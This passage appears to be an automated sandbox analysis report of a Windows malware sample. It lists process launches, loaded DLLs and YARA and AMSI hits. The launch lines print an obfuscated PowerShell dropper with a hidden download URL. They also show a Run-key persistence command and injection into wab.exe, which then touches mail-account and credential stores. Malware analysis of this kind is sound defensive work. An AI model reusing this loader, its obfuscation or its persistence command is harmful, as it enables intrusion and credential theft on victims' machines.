';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\mrynjuqqdntdz" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\otdfknajrvlikyvb" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\znrylxtlfddvmfrffvw" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Subtruncated" /t REG_EXPAND_SZ /d "%Balancegang% -w 1 $Erhvervsvalget=(Get-ItemProperty -Path 'HKCU:\Martyrmines\').Pamphletical;%Balancegang% ($Erhvervsvalget)" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: slc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: loadperf.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: Binary string: ment.Automation.pdb source: powershell.exe, 00000004.00000002.2019633047.0000000007367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: notepad.pdbGCTL source: wscript.exe, 00000000.00000003.1632425939.000001F642AF1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1635082648.000001F640D5F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .Core.pdb(sL source: powershell.exe, 00000004.00000002.2025441868.00000000082F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000004.00000002.2019633047.0000000007367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbt.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 source: powershell.exe, 00000004.00000002.2019633047.00000000073EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000004.00000002.2019633047.0000000007367000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2026042755.0000000008362000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("PowerShell "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Cheve", "Unsupported parameter type 00000000")
Source: Yara match File source: 00000004.00000002.2026854866.000000000B076000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2026688430.0000000008830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2016192272.0000000005B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2236403690.000001FD54C70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Sparkedragter)$global:Underkuedes = [System.Text.Encoding]::ASCII.GetString($Lizardfish)$global:Tzutuhil=$Underkuedes.substring(292461,28062)<#Armeredes Fortrstningens fennernes Gavt
